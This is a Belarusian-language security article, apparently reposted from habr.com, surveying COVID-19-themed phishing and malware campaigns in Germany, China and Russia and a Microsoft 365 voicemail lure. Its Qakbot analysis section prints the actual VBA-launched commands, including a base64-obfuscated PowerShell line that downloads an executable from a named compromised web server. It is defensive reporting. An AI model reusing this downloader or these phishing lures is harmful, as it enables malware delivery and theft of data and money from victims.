Зламыснікі працягваюць эксплуатаваць тэму COVID-19, ствараючы ўсё новыя і новыя пагрозы для карыстальнікаў, якія жыва цікавяцца ўсім, што тычыцца эпідэміі. У мы ўжо казалі аб тым, якія разнавіднасці шкоднаснага ПА з'явіліся на хвалі каранавіруса, а сёння гаворка пойдзе аб прыёмах сацыяльнай інжынерыі, з якімі ўжо сутыкнуліся карыстачы ў розных краінах, а тым ліку і ў Расіі. Агульныя тэндэнцыі і прыклады - пад катом.
Памятайце ў мы казалі аб тым, што людзі ахвотна чытаюць не толькі аб каранавірусе і плыні эпідэміі, але і аб мерах фінансавай падтрымкі? Вось наглядны прыклад. У нямецкім штаце Паўночная Рэйн-Вестфалія (North Rhine-Westphalia глей NRW) была выяўлена цікавая фішынгавая атака. Зламыснікі стварылі копіі сайта міністэрства эканомікі (), дзе любы жадаючы можа зрабіць заяўку на атрыманне матэрыяльнай дапамогі. Такая праграма рэальна існуе, і гэта аказалася на руку ашуканцам. Атрымаўшы персанальныя дадзеныя сваіх ахвяр яны рабілі заяўку ўжо на сапраўдным сайце міністэрства, але ўказвалі іншыя банкаўскія рэквізіты. Па афіцыйных дадзеных было зроблена 4 тыс такіх фальшывых запытаў, пакуль схема не была раскрытая. У выніку $109 мільёнаў, прызначаных для пацярпелых грамадзян, патрапілі ў рукі ашуканцам.
Бясплатны тэст на COVID-19 не жадаеце?
Іншы паказальны прыклад фішынгу на тэму каранавіруса быў у электронных лістах. Паведамленні прыцягвалі ўвагу карыстальнікаў прапановай прайсці бясплатнае тэсціраванне на прадмет заражэння каранавірусам. Ва ўкладанні гэтых знаходзіліся асобнікі Trickbot/Qakbot/Qbot. І калі жадаючыя праверыць сваё здароўе прыступалі да "запаўнення прыкладзенай формы", на кампутар загружаўся шкоднасны скрыпт. А каб пазбегнуць праверкі метадам сэндбоксінга, скрыпт прыступаў да загрузкі асноўнага віруса толькі праз некаторы час, калі сістэмы абароны пераконваліся, што ніякай шкоднаснай актыўнасці не адбываецца.
Пераканаць большасць карыстальнікаў у неабходнасці ўключыць макрасы таксама было нескладана. Для гэтага ўжываўся стандартны трук, калі для запаўнення анкеты трэба спачатку дазволіць макрасы, а значыць – запусціць скрыпт VBA.
Як вы можаце бачыць, скрыпт VBA спецыяльна маскіруецца ад антывірусаў.
У Windows ёсць функцыя чакання, калі прыкладанне чакае /T <секунд>, перш чым прыняць адказ "Так" па змаўчанні. У нашым выпадку скрыпт чакаў 65 секунд, перш чым выдаліць часовыя файлы:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
А падчас чаканні адбывалася загрузка шкоднаснага ПА. Для гэтага быў запушчаны спецыяльны скрыпт PowerShell:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Пасля дэкадавання значэння Base64, скрыпт PowerShell загружае бэкдор, змешчаны на папярэдне ўзламаным вэб-серверы з Нямеччыны:
http://automatischer-staubsauger.com/feature/777777.pngі захоўвае яго пад імем:
C:UsersPublictmpdirfile1.exe
Тэчка ‘C:UsersPublictmpdir’ выдаляецца пры запуску файла 'tmps1.bat', які змяшчае каманду cmd /c mkdir ""C:UsersPublictmpdir"".
Мэтавая атака на дзяржаўныя структуры
Акрамя гэтага нядаўна аналітыкі FireEye паведамілі аб мэтавай атацы APT32, накіраванай на ўрадавыя структуры Уханя, а таксама Міністэрства Неадкладнай Дапамогі Кітая (Chinese Ministry of Emergency Management). У адным з распачатых RTF змяшчалася спасылка на артыкул з New York Times пад назвай . Аднак пры яе чытанні адбывалася загрузка шкоднаснага ПА (Аналітыкі FireEye ідэнтыфікавалі асобнік як METALJACK).
Цікава, што на момант выяўлення ніводны з антывірусаў не дэтэктаваў гэты асобнік паводле дадзеных Virustotal.
Калі афіцыйныя сайты "ляжаць"
Найзыркі прыклад фішынгавай атакі здарыўся ў Расіі літаральна на днях. Нагодай для гэтага стала назначэнне доўгачаканай дапамогі на дзяцей ва ўзросце ад 3 да 16 гадоў. Калі было аб'яўлена аб старце прыёму заяў 12 мая 2020 года, мільёны ірванулі на сайт Дзяржпаслугі па доўгачаканую дапамогу і абрынулі партал не горш за прафесійную DDoS-напад. Калі прэзідэнт сказаў, што "Дзяржпаслугі не справіліся з патокам заявак", у сетцы загаварылі аб тым, што зарабіў альтэрнатыўны сайт прыёму заяў.
Праблема заключаецца ў тым, што сайтаў зарабіла адразу некалькі, і пакуль адзін, сапраўдны па адрасе posobie16.gosuslugi.ru сапраўды прымае заявы, яшчэ .
Калегі з «Серчінформ» знайшлі каля 30 новых ашуканскіх даменаў у зоне. Infosecurity a Softline Company адсачылі больш за 70 падобных фэйкавых сайтаў дзяржпаслуг з пачатку красавіка. Іх стваральнікі маніпулююць звыклай сімволікай, а таксама выкарыстоўваюць камбінацыі са слоў gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie і гэтак далей.
Ажыятаж і сацыяльная інжынерыя
Усе гэтыя прыклады толькі пацвярджаюць, што зламыснікі паспяхова манетызуюць тэматыку каранавіруса. І чым вышэй сацыяльная напруга і чым больш невыразных пытанняў, тым больш шанцаў у ашуканцаў выкрасці важныя дадзеныя, прымусіць людзей самастойна аддаць свае грошы ці проста ўзламаць пабольш кампутараў.
А улічваючы, што пандэмія прымусіла патэнцыйна не гатовых да гэтага людзей масава працаваць з дому, у зоне рызыкі аказваюцца не толькі асабістыя, але і карпаратыўныя дадзеныя. Напрыклад, нядаўна карыстачы Microsoft 365 (былога Office 365) таксама падвергліся фішынгавай атацы. Людзям масава прыходзілі галасавыя “прапушчаныя” паведамленні ва ўкладаннях да лістоў. Аднак фактычна файлы ўяўлялі сабой HTML-старонку, якая адпраўляла ахвяр нападу на . Як следства - страта доступу і кампраметацыя ўсіх дадзеных з акаўнта.
Крыніца: habr.com